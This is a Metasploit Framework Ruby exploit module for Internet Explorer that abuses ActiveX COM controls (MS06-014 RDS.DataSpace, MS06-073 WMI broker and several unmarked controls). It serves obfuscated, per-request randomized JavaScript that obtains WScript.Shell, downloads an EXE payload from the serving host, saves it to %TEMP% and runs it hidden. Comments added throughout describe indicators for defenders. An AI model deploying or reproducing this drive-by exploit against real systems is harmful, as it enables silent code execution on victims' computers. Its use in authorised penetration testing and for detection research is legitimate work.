##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
# Browser exploit module for Internet Explorer. The served page tries to
# instantiate each COM control in the target table and, through one that
# hands back WScript.Shell and ADODB.Stream, fetches the module's payload as
# an EXE and launches it (see on_request_uri).
#
# Defender notes, all taken from the code in this file:
#   * Exposure is limited to clients that can instantiate one of the listed
#     CLSIDs from a web page. The two targets marked "Patched" are the ones
#     covered by the MS06-014 and MS06-073 bulletins under 'References'; for
#     the other controls the mitigation is to keep them from being scripted
#     by the browser (ActiveX kill bit / not marked safe for scripting).
#   * Network indicators: after the landing page is fetched, a second GET to
#     the landing URI with "/payload" appended, answered with
#     Content-Type: application/octet-stream.
#   * Host indicators: an executable with a random alphabetic name written
#     under %TEMP% and started through WScript.Shell.Run.
#   * The HTML/JS is obfuscated (split string literals, per-character CLSID
#     construction, randomized whitespace), so signatures keyed on
#     contiguous strings such as a CLSID or "ADODB.Stream" will not match the
#     page as served.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  # NOTE(review): nothing in this file uses the Seh mixin; the include
  # appears to be unused.
  include Msf::Exploit::Seh
  include Msf::Exploit::EXE

  include Msf::Exploit::Remote::BrowserAutopwn
  # Fingerprint hints for BrowserAutopwn. The :classid list repeats the CLSIDs
  # of the 'Targets' table in initialize (same thirteen entries, same order)
  # and has to be kept in sync by hand.
  autopwn_info({
    :ua_name => HttpClients::IE,
    # In badly misconfigured situations, IE7 and 8 could be vulnerable to
    # this, but by default they throw an ugly popup that stops all script
    # execution until the user deals with it and aborts everything if they
    # click "no". Not worth the risk of being unable to try more recent
    # exploits. Make sure service packs on top of 6.0 are considered less
    # than the max by setting to 6.1 (which doesn't really exist).
    :ua_maxver => "6.1",
    :javascript => true,
    :os_name => OperatingSystems::WINDOWS,
    :method => [ 'CreateObject', 'GetObject' ],
    :classid =>
      [
        '{BD96C556-65A3-11D0-983A-00C04FC29E36}',
        '{BD96C556-65A3-11D0-983A-00C04FC29E30}',
        '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}',
        '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}',
        '{6414512B-B978-451D-A0D8-FCFDF33E833C}',
        '{06723E09-F4C2-43c8-8358-09FCD1DB0766}',
        '{639F725F-1B2D-4831-A9FD-874847682010}',
        '{BA018599-1DB3-44f9-83B4-461454C84BF8}',
        '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}',
        '{E8CCCDDF-CA28-496b-B050-6C07C962476B}',
        '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}',
        '{0006F033-0000-0000-C000-000000000046}',
        '{0006F03A-0000-0000-C000-000000000046}',
      ],
    #:rank => ExcellentRanking # reliable exe writer
  })

  # Module metadata: name, references, payload constraints and the target
  # table. Every target except 'Automatic' carries the CLSID of one COM
  # control; 'Automatic' (index 0, the default) makes on_request_uri try
  # every CLSID in the table in turn.
  #
  # NOTE(review): the two RDS.DataSpace entries share one target name and
  # differ only in CLSID, so the name shown to the operator does not say
  # which of the two is selected.
  #
  # @param info [Hash] module info supplied by the framework, merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Internet Explorer COM CreateObject Code Execution',
      'Description' => %q{
        This module exploits a generic code execution vulnerability in Internet
        Explorer by abusing vulnerable ActiveX objects.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'hdm',
        ],
      # Subversion keyword; expanded at checkout time, not by this code.
      'Version' => '$Revision$',
      'References' =>
        [
          # MDAC
          [ 'MSB', 'MS06-014' ],
          [ 'CVE', '2006-0003' ],
          [ 'OSVDB', '24517' ],
          # WMI Object Broker
          [ 'MSB', 'MS06-073' ],
          [ 'CVE', '2006-4704' ],
          [ 'OSVDB', '30155' ],
        ],
      # The payload is not injected into the browser process; it is embedded
      # in an EXE built by generate_payload_exe in on_request_uri.
      'Payload' =>
        {
          'Space' => 2048,
          'StackAdjustment' => -3500,
        },
      'Platform' => 'win',
      'Targets' =>
        [
          [ 'Automatic', { } ],

          # Patched
          [ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E36}'} ],
          # Found in mpack
          [ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E30}'} ],

          # Patched
          [ 'MS06-073 - WMIScriptUtils.WMIObjectBroker2.1', { 'CLSID' => '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}'} ],

          # These are restricted by site (might be exploitable via DNS spoofing + SSL fun)
          [ 'UNKNOWN - SoftwareDistribution.MicrosoftUpdateWebControl.1', { 'CLSID' => '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}'} ],
          [ 'UNKNOWN - SoftwareDistribution.WebControl.1', { 'CLSID' => '{6414512B-B978-451D-A0D8-FCFDF33E833C}'} ],

          # Visual Studio components, not marked as safe
          [ 'UNKNOWN - VsmIDE.DTE', { 'CLSID' => '{06723E09-F4C2-43c8-8358-09FCD1DB0766}'} ],
          [ 'UNKNOWN - DExplore.AppObj.8.0', { 'CLSID' => '{639F725F-1B2D-4831-A9FD-874847682010}'} ],
          [ 'UNKNOWN - VisualStudio.DTE.8.0', { 'CLSID' => '{BA018599-1DB3-44f9-83B4-461454C84BF8}'} ],
          [ 'UNKNOWN - Microsoft.DbgClr.DTE.8.0', { 'CLSID' => '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}'} ],
          [ 'UNKNOWN - VsaIDE.DTE', { 'CLSID' => '{E8CCCDDF-CA28-496b-B050-6C07C962476B}'} ],

          #
          # The controls below can launch the "installing component" dialogs...
          #

          # Not marked as safe
          [ 'UNKNOWN - Business Object Factory ', { 'CLSID' => '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}'} ],

          # Not marked as safe
          [ 'UNKNOWN - Outlook Data Object', { 'CLSID' => '{0006F033-0000-0000-C000-000000000046}'} ],

          # Found exploitable in the wild (no details)
          [ 'UNKNOWN - Outlook.Application', { 'CLSID' => '{0006F03A-0000-0000-C000-000000000046}'} ],

        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Apr 11 2006'))
  end

  # Serves both stages from one handler: any request whose URI contains
  # "payload" gets the payload EXE; everything else gets the landing page
  # whose script later requests <landing URI>/payload.
  #
  # @param cli the client connection the response is written to
  # @param request the HTTP request; only its URI is inspected here
  # @return [nil] responses are written to cli as a side effect
  def on_request_uri(cli, request)

    # Stage 2: the EXE download.
    # NOTE(review): this is a substring match, so a URIPATH that itself
    # contains "payload" would make every request return the EXE instead of
    # the landing page.
    if (request.uri.match(/payload/))
      # Nothing is sent back when the payload cannot be regenerated; the
      # request is silently dropped.
      return if ((p = regenerate_payload(cli)) == nil)
      data = generate_payload_exe({ :code => p.encoded })
      print_status("Sending EXE payload")
      send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
      return
    end

    # Build out the HTML response page
    # Identifiers and the dropped file's base name are 2..31 random
    # alphabetic characters (rand(30) is 0..29), chosen anew per request so
    # no two served pages share function or file names.
    var_html = rand_text_alpha(rand(30)+2)
    var_func_exploit = rand_text_alpha(rand(30)+2);
    var_func_go = rand_text_alpha(rand(30)+2);
    var_func_createo = rand_text_alpha(rand(30)+2);
    var_exe_name = rand_text_alpha(rand(30)+2);
    var_objects = ''

    # Build the object list based on target selection
    # Each CLSID is emitted as a JS expression of single-character string
    # literals joined with '+', followed by a comma, so the CLSID never
    # appears contiguously in the page. The list is closed by the literal
    # `null` inside the template below, which the JS `while (t[i])` loop
    # uses as its end sentinel.
    if (target.name == 'Automatic')
      targets.each do |t|
        next if not t['CLSID']
        var_objects += t['CLSID'].unpack('C*').map{|c| " '#{c.chr}' "}.join("+") + ","
      end
    else
      var_objects += target['CLSID'].unpack('C*').map{|c| " '#{c.chr}' "}.join("+") + ","
    end


    # What the three script functions in the template do (all method names
    # and ProgIDs are assembled from string fragments and, for CreateObject /
    # GetObject, invoked through eval):
    #   var_func_createo(o, n): tries o.CreateObject(n) with 1..3 arguments,
    #     then o.GetObject variants; returns the object or null.
    #   var_func_go(a): obtains WScript.Shell and ADODB.Stream through the
    #     control a, reads %TEMP% from the shell's Process environment,
    #     fetches document.location + "/payload" synchronously (XMLHttpRequest,
    #     falling back to the Microsoft.XMLHTTP and MSXML2.ServerXMLHTTP
    #     ActiveX objects), writes the response body to a binary stream
    #     (Type 1 = adTypeBinary, Mode 3 = adModeReadWrite), saves it as
    #     %TEMP%\<var_exe_name>.exe (SaveToFile flag 2 = overwrite) and runs
    #     it with window style 0 (hidden).
    #   var_func_exploit(): walks the object list; entries starting with '{'
    #     become an <object> element with a classid attribute, anything else
    #     goes through new ActiveXObject. Since every entry in this module is
    #     a CLSID, the ActiveXObject branch is never taken here. The first
    #     control that yields a WScript.Shell is handed to var_func_go and the
    #     loop stops.
    # The body's onload fires var_func_exploit; var_html is filler text.
    content = %Q^
<html><head><title></title>
<script language="javascript">

function #{var_func_createo}( o , n ) {
  var r = null;

  try { eval("r=o" + ".C" + "re" + "ate" + "Ob" + "je" + "ct(n)" ) }catch(e){}

  if (! r) {
    try { eval("r=o" + ".Cr" + "ea" + "teO" + "bj" + "ect(n,'')" ) }catch(e){}
  }

  if (! r) {
    try { eval("r=o" + ".Cr" + "ea" + "teO" + "bj" + "ect(n,'','')" ) }catch(e){}
  }

  if (! r) {
    try { eval("r=o" + ".Ge" + "tOb" + "je" + "ct('',n)" ) }catch(e){}
  }

  if (! r) {
    try { eval("r=o" + ".Ge" + "tOb" + "ject(n,'')" ) }catch(e){}
  }

  if (! r) {
    try { eval("r=o" + ".Ge" + "tOb" + "ject(n)" ) }catch(e){}
  }

  return( r );
}

function #{var_func_go}( a ) {

  var s = #{var_func_createo}( a, "W" + "Sc" + "ri" + "pt" + ".S" + "he" + "ll" );

  var o = #{var_func_createo}( a, "A" + "DO" + "D" + "B.S" + "tr" + "eam" );

  var e = s.Environment( "P" + "ro" + "ce" + "ss" );


  var url = document.location + '/p' + 'ay' + 'lo' + 'ad';
  var xml = null;
  var bin = e.Item( "T" + "E" + "M" + "P" ) + "\\\\#{var_exe_name}" + ".e" + "xe";
  var dat;

  try { xml=new XMLHttpRequest(); }
  catch(e) {
    try { xml = new ActiveXObject("Microsoft.XMLHTTP"); }
    catch(e) {
      xml = new ActiveXObject("MSXML2.ServerXMLHTTP");
    }
  }

  if (! xml) {
    return(0);
  }

  xml.open("GET", url, false);
  xml.send(null);
  dat = xml.responseBody;

  o.Type = 1 ;
  o.Mode = 3 ;
  o.Open ( ) ;
  o.Write ( dat ) ;
  o.SaveToFile ( bin, 2) ;

  s.Run ( bin , 0 );
}

function #{var_func_exploit}( ) {
  var i = 0;
  var t = new Array( #{var_objects} null );

  while (t[i]) {
    var a = null;

    if (t[i].substring(0,1) == '{') {
      a = document.createElement("object");
      a.setAttribute("cl" + "as" + "sid", "cl" + "s" + "id" +":" + t[i].substring( 1, t[i].length - 1 ) ) ;
    } else {
      try { a = new ActiveXObject(t[i]); } catch(e){}
    }

    if (a) {
      try {
        var b = #{var_func_createo}( a , "W" + "Sc" + "ri" + "pt" + ".S" + "he" + "ll" ) ;
        if (b) {
          #{var_func_go}( a ) ;
          return(0) ;
        }
      } catch(e){
      }
    }
    i++;
  }
}
</script>
</head>
<body onload='#{var_func_exploit}()'>
#{var_html}
</body>
</html>

^


    # Whitespace runs are replaced with random whitespace so the served
    # bytes differ per request; detection should not depend on exact spacing.
    content = Rex::Text.randomize_space(content)

    print_status("Sending exploit HTML...")


    # Transmit the response to the client
    send_response_html(cli, content)

    # Handle the payload
    handler(cli)
  end

end